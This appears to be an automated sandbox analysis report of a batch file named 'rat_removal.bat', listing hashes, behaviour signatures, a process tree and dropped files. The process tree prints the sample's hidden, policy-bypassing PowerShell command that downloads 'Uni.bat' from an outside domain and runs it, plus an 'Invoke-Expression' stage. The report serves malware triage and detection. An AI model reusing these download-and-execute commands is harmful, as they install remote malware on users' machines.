Resubmissions

14/03/2024, 05:24

240314-f3wxmsdg73 10

14/03/2024, 05:13

240314-fwwcjabd6s 8

Analysis

  • max time kernel
    79s
  • max time network
    141s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    14/03/2024, 05:24

General

  • Target

    rat_removal.bat

  • Size

    14KB

  • MD5

    2c0ee080298d0de1320e6e7eda4ca39b

  • SHA1

    edd03f96d4f4277a24e541376fdddf43439b4a99

  • SHA256

    7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e

  • SHA512

    ffdfd43eb46107be849d3e1938d1db0be87d27700799a9f31527b512abaca615241c6ee2d6358061d5ea133233aa0edda9908091419c024977b25365064d9e64

  • SSDEEP

    192:HbKSAmk7b/FQASmmZrQCgljChA4DW0JyquFnpUoH:H28k7b/hkQCgljwAEbyvFpL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4896
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
        PID:4564
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c type tmp
        2⤵
          PID:2028
        • C:\Windows\system32\findstr.exe
          findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
          2⤵
            PID:212
          • C:\Windows\system32\findstr.exe
            findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
            2⤵
              PID:2908
            • C:\Windows\system32\findstr.exe
              findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
              2⤵
                PID:3912
              • C:\Windows\system32\findstr.exe
                findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
                2⤵
                  PID:4540
                • C:\Windows\system32\find.exe
                  find
                  2⤵
                    PID:4556
                  • C:\Windows\system32\find.exe
                    find
                    2⤵
                      PID:1508
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c type tmp
                      2⤵
                        PID:860
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"
                        2⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1160
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3412
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "
                          3⤵
                            PID:8
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                            3⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1072
                      • C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
                        1⤵
                        • Drops file in Windows directory
                        • Suspicious use of SetWindowsHookEx
                        PID:4860

                      Network

                            MITRE ATT&CK Matrix

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                              Filesize

                              3KB

                              MD5

                              d737fc27bbf2f3bd19d1706af83dbe3f

                              SHA1

                              212d219394124968b50769c371121a577d973985

                              SHA256

                              b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

                              SHA512

                              974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

                            • C:\Users\Admin\AppData\Local\Temp\Uni.bat

                              Filesize

                              6.1MB

                              MD5

                              6bdab73b1ae1fb7629bd9c250354a250

                              SHA1

                              24fa877ae0db1d2f1b24ce29ea8eddefddc4afc6

                              SHA256

                              e0fe368de1cd2f3f769182e24944f9e03e7d0483aded6dc27d20b53680ca67bb

                              SHA512

                              f721eff91fdce63097a12fa8a1cf6b48664ad2563439b03369c201c893e502e3a43191ded7782795d0ec84199307042afb8c89cfddfdb39b55286f558dc0357a

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orwd3zkq.uw1.ps1

                              Filesize

                              1B

                              MD5

                              c4ca4238a0b923820dcc509a6f75849b

                              SHA1

                              356a192b7913b04c54574d18c28d46e6395428ab

                              SHA256

                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                              SHA512

                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                            • C:\Users\Admin\AppData\Local\Temp\tmp

                              Filesize

                              14B

                              MD5

                              ce585c6ba32ac17652d2345118536f9c

                              SHA1

                              be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                              SHA256

                              589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                              SHA512

                              d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                            • C:\Users\Admin\Desktop\New Compressed (zipped) Folder.zip

                              Filesize

                              22B

                              MD5

                              76cdb2bad9582d23c1f6f4d868218d6c

                              SHA1

                              b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

                              SHA256

                              8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

                              SHA512

                              5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

                            • memory/1072-108-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

                              Filesize

                              448KB

                            • memory/1072-103-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1072-142-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp

                              Filesize

                              696KB

                            • memory/1072-141-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1072-140-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1072-139-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp

                              Filesize

                              448KB

                            • memory/1072-44-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1072-46-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-48-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-77-0x00000147B3BC0000-0x00000147B3BFC000-memory.dmp

                              Filesize

                              240KB

                            • memory/1072-96-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-132-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-99-0x00000147FC270000-0x00000147FCD1C000-memory.dmp

                              Filesize

                              10.7MB

                            • memory/1072-100-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1072-101-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-113-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1072-104-0x00000147FCD20000-0x00000147FD80C000-memory.dmp

                              Filesize

                              10.9MB

                            • memory/1072-107-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1072-109-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp

                              Filesize

                              696KB

                            • memory/1072-112-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-110-0x00000147B3530000-0x00000147B3540000-memory.dmp

                              Filesize

                              64KB

                            • memory/1072-111-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1160-8-0x0000028671340000-0x0000028671362000-memory.dmp

                              Filesize

                              136KB

                            • memory/1160-14-0x0000028671500000-0x0000028671576000-memory.dmp

                              Filesize

                              472KB

                            • memory/1160-9-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1160-10-0x0000028671370000-0x0000028671380000-memory.dmp

                              Filesize

                              64KB

                            • memory/1160-11-0x0000028671370000-0x0000028671380000-memory.dmp

                              Filesize

                              64KB

                            • memory/1160-39-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1160-29-0x0000028671370000-0x0000028671380000-memory.dmp

                              Filesize

                              64KB